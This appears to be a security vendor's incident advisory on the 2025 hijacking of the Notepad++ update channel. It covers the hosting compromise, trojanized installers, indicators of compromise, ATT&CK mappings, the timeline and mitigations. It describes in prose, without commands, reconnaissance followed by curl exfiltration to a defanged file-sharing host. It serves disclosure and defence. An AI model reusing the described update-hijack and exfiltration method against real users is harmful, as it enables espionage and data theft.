Executive Summary

A critical security incident affecting the Notepad++ text editor was identified between June and December 2025, in which the official update mechanism was hijacked to deliver malware to select users. Attackers compromised the shared hosting infrastructure of the Notepad++ website, enabling them to intercept and redirect update requests from targeted users to malicious servers. This allowed the delivery of trojanized installers that could enumerate system and network information and exfiltrate data, potentially leading to full system compromise. The attack did not exploit a vulnerability in Notepad++ code itself but rather leveraged insufficient update verification controls in older versions and weaknesses at the hosting provider level. The incident was highly targeted, with evidence suggesting involvement by a Chinese state-sponsored threat actor, although direct attribution remains circumstantial. Remediation actions included migration to a new, more secure hosting provider and the implementation of strict digital signature and certificate verification in the update process starting with version 8.8.9. Users are strongly advised to update to the latest version, verify installer signatures, and remain vigilant for suspicious update behavior. This report is based solely on primary, independently corroborated sources, with all technical claims supported by direct evidence.

Technical Information

The compromise of the Notepad++ update mechanism was executed through a multi-stage attack that began with the infiltration of the shared hosting server used by the official Notepad++ website. Attackers specifically targeted the update endpoint (getDownloadUrl.php), which is responsible for providing update metadata and download URLs to client installations. The initial compromise occurred at the infrastructure level, not through a vulnerability in the Notepad++ application code. This distinction is critical, as it underscores the importance of supply chain and infrastructure security for widely used open-source projects.

After gaining access to the hosting server, the attackers were able to intercept and selectively redirect update requests from certain users to attacker-controlled servers. This redirection was not indiscriminate; logs and analysis indicate that only specific users or organizations were targeted, suggesting a high degree of operational security and intent. The attackers maintained persistence even after direct server access was lost on September 2, 2025, by retaining credentials to internal hosting provider services. This allowed them to continue redirecting update traffic until December 2, 2025, when all access was definitively terminated following credential rotation and security hardening by the hosting provider.

The malicious update process involved serving trojanized Notepad++ installers to targeted users. Technical analysis by Bitdefender revealed that the rogue updater behavior included the spawning of an unauthorized executable, AutoUpdater.exe, by the legitimate GUP.exe updater component. This malicious executable performed a series of reconnaissance actions, including listing network connections, system details, running processes, and the current user. The collected information was saved to a file (a.txt) and exfiltrated using curl to temp[.]sh, an anonymous file-sharing service previously observed in other malware campaigns. The legitimate WinGUp updater only uses the libcurl library internally and does not launch curl.exe or perform host reconnaissance, making this behavior a clear indicator of compromise.

The attack leveraged the lack of cryptographic verification in older versions of Notepad++. Prior to version 8.8.9, the updater did not enforce strict digital signature or certificate validation for downloaded installers, allowing attackers to substitute malicious payloads if they could control the update metadata or download URL. This supply chain weakness was exploited to deliver malware under the guise of legitimate updates.

In response, the Notepad++ development team released version 8.8.8 in November 2025, which restricted update downloads to trusted sources (GitHub). A more comprehensive fix was implemented in version 8.8.9, released on December 9, 2025, which introduced mandatory digital signature and certificate verification for all update packages. The update process now aborts if the installer is unsigned or improperly signed, effectively mitigating the risk of similar attacks via update channel hijacking. Additionally, the XML metadata returned by the update server is now signed using XMLDSig, with enforcement of certificate and signature verification planned for version 8.9.2.

The attack is mapped to several MITRE ATT&CK techniques, including T1195.002 (Supply Chain Compromise), T1557.002 (Man-in-the-Middle), T1078 (Valid Accounts), T1204.002 (User Execution: Malicious File), T1082 (System Information Discovery), and T1041 (Exfiltration Over C2 Channel). The technical evidence supporting these mappings includes server logs, malware behavior, and the use of known exfiltration channels.

Attribution analysis suggests the involvement of a Chinese state-sponsored group, based on the sophistication of the attack, the selective targeting, and the operational patterns observed. However, this attribution is assessed with medium confidence, as there are no direct technical artifacts linking the attack to a specific group. The use of temp[.]sh for exfiltration and the focus on supply chain compromise are consistent with previous Chinese APT operations, such as the CCleaner and ShadowPad incidents, but are not unique to any one actor.

The incident highlights the broader risks associated with software supply chain attacks, particularly for open-source tools widely used across government, enterprise, and critical infrastructure sectors. The selective targeting observed in this case underscores the need for robust cryptographic verification in all software update mechanisms and the importance of securing third-party infrastructure.

Affected Versions & Timeline

The affected versions of Notepad++ are all releases prior to version 8.8.9. The compromise began in June 2025, with attackers maintaining some level of access to the hosting infrastructure until December 2, 2025. The most active period of malicious redirection and update hijacking occurred between June and November 10, 2025. Direct server access by the attackers was lost on September 2, 2025, following scheduled maintenance and security updates by the hosting provider. However, the attackers retained credentials to internal services, allowing continued exploitation until all credentials were rotated and security hardening was completed on December 2, 2025. The attack is considered fully remediated as of this date, with all attacker access terminated and no evidence of ongoing compromise.

Threat Activity

The threat activity associated with this incident was characterized by a highly targeted supply chain attack. Attackers compromised the shared hosting server used by the Notepad++ website, focusing specifically on the update endpoint to intercept and redirect update requests. The redirection was selective, targeting specific users or organizations rather than the entire user base. This approach is consistent with advanced persistent threat (APT) operations seeking to minimize detection and maximize impact on high-value targets.

The malicious payload delivered via the hijacked update mechanism was a trojanized installer that, when executed, performed system and network reconnaissance. The malware enumerated network connections, system details, running processes, and the current user, saving the results to a file and exfiltrating the data using curl to temp[.]sh. This behavior indicates an initial access and reconnaissance phase, potentially as a precursor to further exploitation or lateral movement within targeted organizations.

There is no evidence to suggest that the malware included ransomware or destructive capabilities. The focus was on information gathering and exfiltration, consistent with espionage-oriented objectives. The use of legitimate update channels and the selective targeting of victims demonstrate a high level of sophistication and operational security.

The attack exploited the lack of cryptographic verification in the Notepad++ update process prior to version 8.8.9. By controlling the update metadata and download URLs, attackers were able to deliver malicious payloads that appeared legitimate to end users. The incident underscores the importance of end-to-end integrity and authenticity checks in software update mechanisms.

Mitigation & Workarounds

The following mitigation actions are recommended, prioritized by severity:

Critical: All users of Notepad++ should immediately update to version 8.8.9 or later, which includes strict digital signature and certificate verification for all update packages. This is the most effective measure to prevent exploitation of the update mechanism.

High: Users should verify that any Notepad++ installer is signed by GlobalSign and that Windows reports "This digital signature is OK." Only installers downloaded from the official Notepad++ website or trusted sources such as GitHub should be used. Avoid downloading or executing installers from unofficial websites or third-party sources.

High: Remove any old Notepad++ self-signed certificates from the system certificate store to ensure that only trusted signatures are accepted during the update process.

Medium: Monitor the updater and TEMP folders for unusual files. Legitimate updates are handled automatically by WinGUp.exe and the official installer. The presence of unexpected files such as update.exe or AutoUpdater.exe may indicate compromise and should be investigated immediately.

Medium: Backup important files before performing updates to prevent potential data loss in the event of a failed or malicious update.

Low: Organizations should review their software supply chain security practices, including the use of cryptographic verification for all third-party software updates and the security of hosting and distribution infrastructure.

These recommendations are based on guidance from the Notepad++ development team, Bitdefender, and the Rwanda National Cyber Security Authority. Users and organizations should remain vigilant for any unusual update behavior and report suspected incidents to their security teams or relevant authorities.

References

Notepad++ Official Disclosure: https://notepad-plus-plus.org/news/hijacked-incident-info-update/ (2026-02-02)

Bitdefender Technical Analysis: https://www.bitdefender.com/en-us/blog/hotforsecurity/notepad-tightens-update-security-after-suspected-hijack-attempts (2025-12-12)

Rwanda National Cyber Security Authority Advisory: https://cyber.gov.rw/updates/article/security-alert-notepad-update-vulnerability-enables-malware-installation/ (2025-12-12)

MITRE ATT&CK Techniques: T1195.002: https://attack.mitre.org/techniques/T1195/002/ T1557.002: https://attack.mitre.org/techniques/T1557/002/ T1078: https://attack.mitre.org/techniques/T1078/ T1204.002: https://attack.mitre.org/techniques/T1204/002/ T1082: https://attack.mitre.org/techniques/T1082/ T1041: https://attack.mitre.org/techniques/T1041/

About Rescana

Rescana provides a third-party risk management (TPRM) platform designed to help organizations identify, assess, and monitor risks in their software supply chain and vendor ecosystem. Our platform enables continuous monitoring of supplier infrastructure, automated risk scoring, and actionable insights to support incident response and remediation planning. For questions or further information, please contact us at ops@rescana.com.